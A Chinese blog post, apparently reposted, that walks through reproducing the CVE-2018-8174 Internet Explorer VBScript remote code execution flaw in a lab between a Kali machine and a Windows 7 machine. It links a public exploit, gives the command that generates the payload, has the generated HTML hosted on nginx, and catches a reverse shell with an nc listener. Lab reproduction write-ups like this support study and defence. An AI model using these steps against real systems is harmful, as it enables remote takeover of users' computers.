CVE-2018-8174漏洞復現(IE瀏覽器遠程代碼執行漏洞)


漏洞介紹:CVE-2018-8174這個漏洞是針對IE瀏覽器的一個遠程代碼執行漏洞,是Windows VBScript Engine 代碼執行漏洞,由於VBScript腳本執行引擎(vbscript.dll)存在代碼執行漏洞,攻擊者可以將惡意的VBScript嵌入到office文件或者網站中,一旦用戶不小心點擊,遠程攻擊者可以獲取當前用戶權限執行腳本中的惡意代碼。

受影響產品:Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers

復現過程

環境:kali[192.168.86.132]  + (win7+IE)[192.168.86.130]

step1、去Github下載exp到kali上

(下載地址:https://github.com/Sch01ar/CVE-2018-8174_EXP

 進入文件目錄

 

 然后生成payload

python CVE-2018-8174.py -u payload的url -o rtf文件的名字 -i ip地址 -p 端口

然后就能看到生成了兩個文件:一個HTML、一個rtf文件

將HTML文件復制到nginx的網站

 

 

 step2、關閉apache服務、重啟Nginx(現在的kali是自帶安裝好了apache和nginx了)

 

 

step3、啟動nc監聽剛剛設置好的端口,等待對方打開網站

 

 

 

 step4、用win7的IE瀏覽器打開url地址

IE瀏覽器打開網頁,雖然沒有正常顯示這個頁面,但是已經攻擊成功了,攻擊機上沒有發覺什么異樣情況

 

 step5、返回kali看看,已經反彈一個shell了

 

over!!!(今天復現了一個漏洞,寫了個筆記發在這里啦!)

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM